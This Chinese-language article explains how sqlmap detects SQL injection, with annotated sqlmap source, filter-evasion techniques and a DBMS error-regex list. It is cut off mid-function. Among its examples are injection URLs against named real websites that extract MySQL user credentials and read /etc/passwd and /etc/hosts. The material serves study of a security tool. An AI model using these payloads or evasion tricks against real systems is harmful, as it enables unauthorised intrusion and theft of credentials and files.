sqlmap 中的 SQL Injection 检测技术

https://github.com/henices/sqli
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)

基于信道的 sql injection 分类

Inband

SQL代码注入和SQL injection 结果的获取在同一频道(e.g. 浏览器), 获得的数据直接显示在应用程序页面的正常输出或者错误信息中,这是最简单的攻击类型。

Out-of-band

SQL查询数据的传输使用不同的频道(e.g HTTP,DNS), 这是从数据库中获取大量数据简单的方法。

Inferential

没用真实有用的数据传输,但是攻击者可以通过发送特定的请求,观察数据库服务器的返回的结果的行为重建信息。

基于 sql inject 检测技术的分类

boolean-based blind SQL injection

也被称为推理SQL注入:SqlMap替换或追加HTTP请求中受影响的参数,一个有效的SQL语句字符串包含 SELECT 子语句,或任何其他用户要检索输出的SQL语句。对于每个HTTP响应,将其 headers/body和原始请求的做比较,该工具一个字符一个字符地分析的注入语句的输出。另外,用户可以提供一个字符串或正则表达式匹配正确的页面。使用SqlMap实现的二分算法来实施执行此技术可以获取七个最大的每个HTTP请求的输出的每一个字符。凡不属于输出纯文本纯字符集,SqlMap将适应与更大范围的算法来检测输出。

error-based SQL injection

sqlmap替换或者追加受影响的HTTP参数一个特定数据的语法错误的SQL语句,分析HTTP 响应header和body,查询DBMS错误信息中是否包含注入的预先定义的字符串链,并且SQL语句的输出在字符串链的中间.这种技术仅在web应用程序被配置成泄漏后端数据库管理系统错误信息时有效。

time-based blind or stacked queries

也被称为全盲SQL注入:SqlMap替换或追加HTTP请求中受影响的参数,构造一个有效的SQL语句字符串包含一个查询,使后端DBMS sleep几秒钟。对于每个HTTP响应,比较其响应时间与原始请求的HTTP响应时间,该工具一个字符一个字符地分析的注入语句的输出。和boolean-based技术一样,同样应用了二分算法(bisection algorithm)。

UNION query SQL injection

SqlMap 追加受影响的参数一个以UNION ALL SELECT开始的有效的SQL语句字符串。这种技术当Web应用程序页面内将SELECT语句的同一周期输出,或者类似的,网页上的内容中显示查询结果的每一行时有效。SqlMap是还可以利用部分UNION 查询的SQL注入漏洞,当SQL语句的输出不是在一个周期内的,在构造的区域内只有在查询输出的第一项被显示。

Stacked queries SQL injection

也被称为多语句SQL注入(multiple statements SQL injection):SqlMap 测试 Web 应用程序是否支持批量叠查询, 然后,它支持的情况下,它附加到HTTP请求中受影响的参数,一个分号(;) 随后的SQL语句会被执行。这种技术在执行 SELECT以外的SQL语句时非常有用,根据后端数据库管理系统的不同用户和会话特权,数据定义和数据操作SQL语句可能导致文件系统的读写访问和操作系统命令执行的。

SQL Injection 检测的逃逸技术

随机大小写

1
INSERT => InsERt

支持的数据库类型:

数据库 是否支持
MSSQL 支持
MySQL 支持
PostgreSQL 支持
Oracle 支持

空格用注释替换

1
SELECT id FROM users => SELECT/**/id/**/FROM/**/users

支持的数据库类型:

数据库 是否支持
MSSQL 支持
MySQL 支持
PostgreSQL 支持
Oracle 支持
Access 不支持

Oracle 10g 测试

1
SQL> select/**/*/**/from v$version;
1
2
3
4
5
6
7
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE 10.1.0.3.0 Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production

PostgreSQL:

1
postgres=# select/*abc*/version();
1
2
3
                                                               version                                                                
--------------------------------------------------------------------------------------------------------------------
PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)

随机注释

1
INSERT => IN/**/S/**/ERT

本身语法不支持,但可以对付不正确的过滤.

1
postgres=# selec/**/t version();

ERROR: syntax error at or near “selec” 在字符 1
第 1 行: selec/**/t version();

Oracle:

1
SQL> sel/**/ect v$version;

SP2-0734: unknown command beginning “sel/**/ect…” - rest of line ignored.

空格用+替换

1
SELECT id FROM users => SELECT+id+FROM+users

随机空格替换

1
SELECT id FROM users => SELECT\rid\tFROM\nusers
数据库 是否支持
MSSQL 支持
Mysql 支持
PostgreSQL 支持
Oracle 支持
1
2
3
4
5
6
7
8
9
10
$echo -e "select\t*from\tv\$version;"| sqlplus "/ as sysdba"

SQL>
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
CORE 10.1.0.3.0 Production
TNS for Linux: Version 10.1.0.3.0 - Production
NLSRTL Version 10.1.0.3.0 - Production
1
2
3
4
echo -e "select\tversion();" | psql -U postgres
version
--------------------------------------------------------------------------------------------------------------------------------------
PostgreSQL 8.1.4 on i686-pc-linux-gnu, compiled by GCC i686-pc-linux-gnu-gcc (GCC) 3.4.6 (Gentoo 3.4.6-r1, ssp-3.4.5-1.0, pie-8.7.9)

urlencode

1
SELECT FIELD FROM%20TABLE' => '%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45'

between 替换

1
A > B' => 'A NOT BETWEEN 0 AND B

逃避正则表达式检测

1
or 1=1  使用  or 'a'='a'

DBMS分析技术

通过错误信息分析DBMS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
<?xml version="1.0" encoding="UTF-8"?>

<root>
<!-- MySQL -->
<dbms value="MySQL">
<error regexp="SQL syntax.*MySQL"/>
<error regexp="Warning.*mysql_.*"/>
<error regexp="valid MySQL result"/>
<error regexp="MySqlClient\."/>
</dbms>

<!-- PostgreSQL -->
<dbms value="PostgreSQL">
<error regexp="PostgreSQL.*ERROR"/>
<error regexp="Warning.*\Wpg_.*"/>
<error regexp="valid PostgreSQL result"/>
<error regexp="Npgsql\."/>
</dbms>

<!-- Microsoft SQL Server -->
<dbms value="Microsoft SQL Server">
<error regexp="Driver.* SQL[\-\_\ ]*Server"/>
<error regexp="OLE DB.* SQL Server"/>
<error regexp="(\W|\A)SQL Server.*Driver"/>
<error regexp="Warning.*mssql_.*"/>
<error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
<error regexp="Exception Details:.*\WSystem\.Data\.SqlClient\."/>
<error regexp="Exception Details:.*\WRoadhouse\.Cms\."/>
</dbms>

<!-- Microsoft Access -->
<dbms value="Microsoft Access">
<error regexp="Microsoft Access Driver"/>
<error regexp="JET Database Engine"/>
<error regexp="Access Database Engine"/>
</dbms>

<!-- Oracle -->
<dbms value="Oracle">
<error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
<error regexp="Oracle error"/>
<error regexp="Oracle.*Driver"/>
<error regexp="Warning.*\Woci_.*"/>
<error regexp="Warning.*\Wora_.*"/>
</dbms>

<!-- DB2 -->
<dbms value="DB2">
<error regexp="CLI Driver.*DB2"/>
<error regexp="DB2 SQL error"/>
</dbms>

<!-- Informix -->
<dbms value="Informix">
<error regexp="Exception.*Informix"/>
</dbms>

<!-- Interbase/Firebird -->
<dbms value="Firebird">
<error regexp="Dynamic SQL Error"/>
<error regexp="Warning.*ibase_.*"/>
</dbms>

<!-- SQLite -->
<dbms value="SQLite">AND '[RANDSTR]'='[RANDSTR]
<error regexp="SQLite/JDBCDriver"/>
<error regexp="SQLite.Exception"/>
<error regexp="System.Data.SQLite.SQLiteException"/>
<error regexp="Warning.*sqlite_.*"/>
<error regexp="Warning.*SQLite3::"/>
</dbms>

<!-- SAP MaxDB -->
<dbms value="SAP MaxDB">
<error regexp="SQL error.*POS([0-9]+).*"/>
<error regexp="Warning.*maxdb.*"/>
</dbms>

<!-- Sybase -->
<dbms value="Sybase">
<error regexp="Warning.*sybase.*"/>
<error regexp="Sybase message"/>
<error regexp="Sybase.*Server message.*"/>
</dbms>

<!-- Ingres -->
<dbms value="Ingres">
<error regexp="Warning.*ingres_"/>
<error regexp="Ingres SQLSTATE"/>
<error regexp="Ingres\W.*Driver"/>
</dbms>

</root>

更详细地需要DBMS fingerprint 识别技术

检测SQL Injection 的报文

  1. 检查参数是否动态
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
def checkDynParam(place, parameter, value):
"""
This function checks if the url parameter is dynamic. If it is
dynamic, the content of the page differs, otherwise the
dynamicity might depend on another parameter.
"""

kb.matchRatio = None

infoMsg = "testing if %s parameter '%s' is dynamic" % (place, parameter)
logger.info(infoMsg)

# 生成一个随机字符串
randInt = randomInt()
payload = agent.payload(place, parameter, value, getUnicode(randInt))
logger.debug("checkDynParam: %s", payload)
dynResult = Request.queryPage(payload, place, raise404=False)

# 如果和原先页面一样,不是动态参数
if True == dynResult:
return False

infoMsg = "confirming that %s parameter '%s' is dynamic" % (place, parameter)
logger.info(infoMsg)
# 再次检查,确认
randInt = randomInt()
payload = agent.payload(place, parameter, value, getUnicode(randInt))
dynResult = Request.queryPage(payload, place, raise404=False)

return not dynResult
  1. 启发式检测,长度为10的 “,’, ), ( 随机字符串, 使用python RandomStr, 如果发生已知错误,报可能存在sql injection, 可能的数据库

  2. 基于risk 和 level的级别,使用payloads.xml中的报文进行检测

  3. 判断url连接是否稳定,连续连接url两次,如果返回内容完全相同,则认为url稳定。

  4. NullConnection http://www.wisec.it/sectou.php?id=472f952d79293

怎么判断injected payload 成功

comparison 算法, boolean-based blind SQL injections

使用 difflib.SequenceMatcher, 基于页面相似度如果请求发生错误,所有不正确的请求都认为正确。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
def comparison(page, getRatioValue=False, pageLength=None):
if page is None and pageLength is None:
return None

regExpResults = None

seqMatcher = getCurrentThreadData().seqMatcher
#logger.debug(kb.pageTemplate)
seqMatcher.set_seq1(kb.pageTemplate)

if page:
# String to match in page when the query is valid
#a.1 如果出现指定字符串,返回True
if conf.string:
condition = conf.string in page
return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)

# Regular expression to match in page when the query is valid
# a.2 如果出现指定正则表达式,返回Ture
if conf.regexp:
condition = re.search(conf.regexp, page, re.I | re.M) is not None
return condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO)

# In case of an DBMS error page return None
if kb.errorIsNone and (wasLastRequestDBMSError() or wasLastRequestHTTPError()):
return None

# Dynamic content lines to be excluded before comparison
# a.4 比较前先将两个页面的动态内容移除
if not kb.nullConnection:
page = removeDynamicContent(page)
seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate))

if not pageLength:
pageLength = len(page)

# 连接发生错误
if kb.nullConnection and pageLength:
if not seqMatcher.a:
errMsg = "problem occured while retrieving original page content "
errMsg += "which prevents sqlmap from continuation. please rerun, "
errMsg += "and if problem persists please turn off optimization switches"
raise sqlmapNoneDataException, errMsg

ratio = 1. * pageLength / len(seqMatcher.a)

if ratio > 1.:
ratio = 1. / ratio
else:
# 正常连接情况, 判断是否使用textOnly命令行参数
seqMatcher.set_seq1(getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a)
seqMatcher.set_seq2(getFilteredPageContent(page, True) if conf.textOnly else page)
# float 3 digits
ratio = round(seqMatcher.quick_ratio(), 3)
logger.debug('ratio: %s' % ratio)

# If the url is stable and we did not set yet the match ratio and the
# current injected value changes the url page content
if kb.matchRatio is None:
if kb.pageStable and ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND:
kb.matchRatio = ratio
logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio)

elif not kb.pageStable:
# CONSTANT_RATIO = 0.900
kb.matchRatio = CONSTANT_RATIO
logger.debug("setting match ratio for current parameter to default value 0.900")

# If it has been requested to return the ratio and not a comparison
# response
if getRatioValue:
return ratio

# ratio > 0.98, 认为两个页面一样
elif ratio > UPPER_RATIO_BOUND:
return True

elif kb.matchRatio is None:
return None

else:
# url 不稳定
if kb.matchRatio == CONSTANT_RATIO:
return ratio > kb.matchRatio
else:
# DIFF_TOLERANCE = 0.05 magic number
return (ratio - kb.matchRatio) > DIFF_TOLERANCE


移除动态内容
def removeDynamicContent(page):
"""
Removing dynamic content from supplied page basing removal on
precalculated dynamic markings
"""

if page:
for item in kb.dynamicMarkings:
prefix, suffix = item

if prefix is None and suffix is None:
continue
elif prefix is None:None
page = getCompiledRegex('(?s)^.+%s' % suffix).sub(suffix, page)
elif suffix is None:
page = getCompiledRegex('(?s)%s.+$' % prefix).sub(prefix, page)
else:
page = getCompiledRegex('(?s)%s.+%s' % (prefix, suffix)).sub('%s%s' % (prefix, suffix), page)

return page

# 查找动态内容
def findDynamicContent(firstPage, secondPage):
"""
This function checks if the provided pages have dynamic content. If they
are dynamic, proper markings will be made
"""

infoMsg = "searching for dynamic content"
logger.info(infoMsg)

# 返回匹配的内容
blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()
kb.dynamicMarkings = []

# Removing too small matching blocks
i = 0
while i < len(blocks):
block = blocks[i]
(_, _, length) = block

# DYNAMICITY_MARK_LENGTH = 32
if length <= DYNAMICITY_MARK_LENGTH:
blocks.remove(block)

else:
i += 1

# Making of dynamic markings based on prefix/suffix principle
if len(blocks) > 0:

# 在blocks的前后添加None
blocks.insert(0, None)
blocks.append(None)

#
for i in xrange(len(blocks) - 1):
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None

if prefix is None and blocks[i + 1][0] == 0:
continue

if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
continue

# 去掉字符串头和尾的字母和数字
prefix = trimAlphaNum(prefix)
suffix = trimAlphaNum(suffix)

kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH/2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH/2]) if suffix else None))

if len(kb.dynamicMarkings) > 0:
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
logger.info(infoMsg)

grep(正则表达式), error-based SQL injection, 可以检查

MS SQL server, Oracle, Mysql等,使用的语句,使用随机字符串查询,如果返回结果的body,或者头部信息中包含我们构造的随机字符串,则认为存在漏洞.具体数据可以使用sqlmap, payloads.xml,例子:

MySQL >= 5.0 AND error-based - WHERE or HAVING clause

1
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136%20AND%20(SELECT%209066%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION()%20AS%20CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)

urldecode 后:

1
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 9066 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,108,98,58),(MID((IFNULL(CAST(VERSION() AS CHAR),CHAR(32))),1,50)),CHAR(58,108,112,108,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
  • CONCAT 字符串连接
  • IFNULL 判断是否为空
  • CAST 将字符串转化为不同的字符集
  • MID 字符串截取 MID(string, position[, length])
  • CHAR(58,106,108,98,58) => :bjl:
  • CHAR(58,108,112,108,58) => :lpl:

利用的Mysql的一个特性,http://bugs.mysql.com/bug.php?id=32249

Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

这部分没有记录。

PostgreSQL AND error-based - WHERE or HAVING clause

这部分没有记录。

Oracle AND error-based - WHERE or HAVING clause (XMLType)

1
http://to.goojje.com/qunba.php?ac=thread_qb&tid=9136 AND (SELECT 6531 FROM(SELECT COUNT(*),CONCAT(CHAR(58,121,121,98,58),(SELECT MID(IFNULL(CAST(concat(user,char(58),password) AS CHAR), CHAR(32)),1,50) FROM mysql.user LIMIT 0,1),CHAR(58,106,116,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

unionTest() 函数,UNION query (inband) SQL injection

(1) 设置union 使用的字符和注释
(2) 判断union查询的列数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, multipleUnions=None, limited=False):
"""
Take in input an query (pseudo query) string and return its
processed UNION ALL SELECT query.

Examples:

MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488

PostgreSQL input: (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow
PostgreSQL output: UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713

Oracle input: (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))
Oracle output: UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738

Microsoft SQL Server input: (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins
Microsoft SQL Server output: UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254

@param query: it is a processed query string unescaped to be
forged within an UNION ALL SELECT statement
@type query: C{str}

@param position: it is the NULL position where it is possible
to inject the query
@type position: C{int}

@return: UNION ALL SELECT query string forged
@rtype: C{str}
"""

if query.startswith("SELECT "):
query = query[len("SELECT "):]

inbandQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)

if limited:
inbandQuery += ",".join(map(lambda x: char if x != position else '(SELECT %s)' % query, xrange(0, count)))
inbandQuery += FROM_TABLE.get(Backend.getIdentifiedDbms(), "")
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)

return inbandQuery

topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
if topNumRegex:
topNum = topNumRegex.group(1)
query = query[len("TOP %s " % topNum):]
inbandQuery += "TOP %s " % topNum

intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)

if intoRegExp:
intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)]

if Backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
inbandQuery = inbandQuery[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]

for element in xrange(0, count):
if element > 0:
inbandQuery += ", "

if element == position:
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ")
inbandQuery += query[:conditionIndex]
else:
inbandQuery += query
else:
inbandQuery += char

if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ")
inbandQuery += query[conditionIndex:]

if Backend.getIdentifiedDbms() in FROM_TABLE:
if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery:
inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]

if intoRegExp:
inbandQuery += intoRegExp

if multipleUnions:
inbandQuery += " UNION ALL SELECT "

for element in xrange(count):
if element > 0:
inbandQuery += ", "

if element == position:
inbandQuery += multipleUnions
else:
inbandQuery += char

if Backend.getIdentifiedDbms() in FROM_TABLE:
inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]

inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)

return inbandQuery


def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=PAYLOAD.WHERE.ORIGINAL):
"""
Finds number of columns affected by UNION based injection
"""
retVal = None

pushValue(kb.errorIsNone)
items, ratios = [], []
kb.errorIsNone = False
lowerCount, upperCount = conf.uColsStart, conf.uColsStop

if abs(upperCount - lowerCount) < MIN_UNION_RESPONSES: # MIN_UNION_RESPONSES = 5
upperCount = lowerCount + MIN_UNION_RESPONSES

min_, max_ = MAX_RATIO, MIN_RATIO # MAX_RATIO = 1.0, MIN_RATIO = 0.0

for count in range(lowerCount, upperCount+1):
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, conf.uChar)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
ratio = comparison(page, True) or MIN_RATIO
ratios.append(ratio)
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))

ratios.pop(ratios.index(min_)) # pop the min
ratios.pop(ratios.index(max_)) # pop the max

deviation = stdev(ratios) # 计算标准偏差

if abs(max_ - min_) < MIN_STATISTICAL_RANGE: # MIN_STATISTICAL_RANGE = 0.01
return None

# UNION_STDEV_COEFF = 7
lower, upper = average(ratios) - UNION_STDEV_COEFF * deviation, average(ratios) + UNION_STDEV_COEFF * deviation
minItem, maxItem = None, None

for item in items:
if item[1] == min_:
minItem = item
elif item[1] == max_:
maxItem = item

if min_ < lower:
retVal = minItem[0]

if max_ > upper:
if retVal is None or abs(max_ - upper) > abs(min_ - lower):
retVal = maxItem[0]

kb.errorIsNone = popValue()

if retVal:
infoMsg = "target url appears to be UNION injectable with %d columns" % retVal
logger.info(infoMsg)

return retVal

(3) 根据不同的数据库加上必要的from 表名
(4) 再次验证

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
def __unionPosition(comment, place, parameter, value, prefix, suffix, count, where=PAYLOAD.WHERE.ORIGINAL):
validPayload = None
vector = None

positions = range(0, count)

# Unbiased approach for searching appropriate usable column
# list 中元素乱序
random.shuffle(positions)

# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability
# 查找可以显示的列
for position in positions:
# Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) #UNION_MIN_RESPONSE_CHARS = 10
# 构造随机字符串做标记
phrase = "%s%s%s".lower() % (kb.misc.start, randQuery, kb.misc.stop)
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
import logging
logging.debug('randQueryProcessed: %s' % randQueryProcessed)
randQueryUnescaped = unescaper.unescape(randQueryProcessed)

# Forge the inband SQL injection request
# 构造UNION ALL SELECT 查询
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
# 移除反射的内容
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")

if content and phrase in content:
validPayload = payload
vector = (position, count, comment, prefix, suffix, conf.uChar, where)

if where == PAYLOAD.WHERE.ORIGINAL:
# Prepare expression with delimiters
randQuery2 = randomStr(UNION_MIN_RESPONSE_CHARS) # UNION_MIN_RESPONSE_CHARS = 10
phrase2 = "%s%s%s".lower() % (kb.misc.start, randQuery2, kb.misc.stop)
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)

# Confirm that it is a full inband SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, conf.uChar, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=PAYLOAD.WHERE.NEGATIVE)

# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")

if content and ((phrase in content and phrase2 not in content) or (phrase not in content and phrase2 in content)):
vector = (position, count, comment, prefix, suffix, conf.uChar, PAYLOAD.WHERE.NEGATIVE)

break

return validPayload, vector
1
http://ipv6.tsinghua.edu.cn/end.php?ID=-3255%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,107,113,117,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,104,111,115,116,115%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,101,114,112,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#
1
http://ipv6.tsinghua.edu.cn/end.php?ID=-8675%20UNION%20ALL%20SELECT%20NULL,%20CONCAT%28CHAR%2858,108,100,107,58%29,IFNULL%28CAST%28LOAD_FILE%28CHAR%2847,101,116,99,47,112,97,115,115,119,100%29%29%20AS%20CHAR%29,CHAR%2832%29%29,CHAR%2858,111,121,105,58%29%29,%20NULL,%20NULL,%20NULL,%20NULL,%20NULL#

基于响应时间, time-based blind and stacked queries SQL injections

判断是否delay,在 lib/core/common.py 中wasLastRequestDelayed 实现根据统计结果,sqlmap 注释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
def wasLastRequestDelayed():
"""
Returns True if the last web request resulted in a time-delay
"""

# 99.9999999997440% of all non time-based sql injection affected
# response times should be inside +-7*stdev([normal response times])
# Math reference: http://www.answers.com/topic/standard-deviation
deviation = stdev(kb.responseTimes) # 计算所有响应时间的标准偏差
threadData = getCurrentThreadData()

